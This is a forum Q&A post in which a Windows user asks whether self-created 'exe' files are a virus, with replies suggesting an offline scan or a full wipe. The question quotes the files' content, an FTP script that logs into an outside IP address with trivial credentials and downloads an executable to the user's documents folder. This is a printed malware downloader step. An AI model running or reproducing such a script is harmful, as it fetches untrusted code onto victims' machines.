# Virus creates exe files with text content

Tags: batch, malware, windows

> **Possible Duplicate:**
>   [My server's been hacked EMERGENCY](https://serverfault.com/questions/218005/my-servers-been-hacked-emergency)

Something automatically creates exe files like "zytudou.exe" on my PC with text content:

```
open 122.138.203.175
123
123
get tudou.exe C:\DOCUME~1\sttudou.exe
bye
```

Is it a virus?
How to disable that or remove it?

Thanks!

Comment: Coming from China Unicom, it looks like. Not usually a good sign. As suggested, clicking the cloud below may be your best hope.

Comment: Annoying: the text of this question kept causing Avast anti-virus to proclaim it had blocked a trojan.

Answer (score 4, accepted):

It's possible that this is innocuous - *possible*. What I recommend is an offline virus scan using a rescue CD like the one provided for free by Kaspersky. That will tell you for certain if there is a known virus on the PC. If there isn't one, then you're golden. If there ***is*** one, then...

## ↓ Click the Pretty Cloud! ↓

[image: Nuke it from orbit!]

## ↑ You'll Like It!! ↑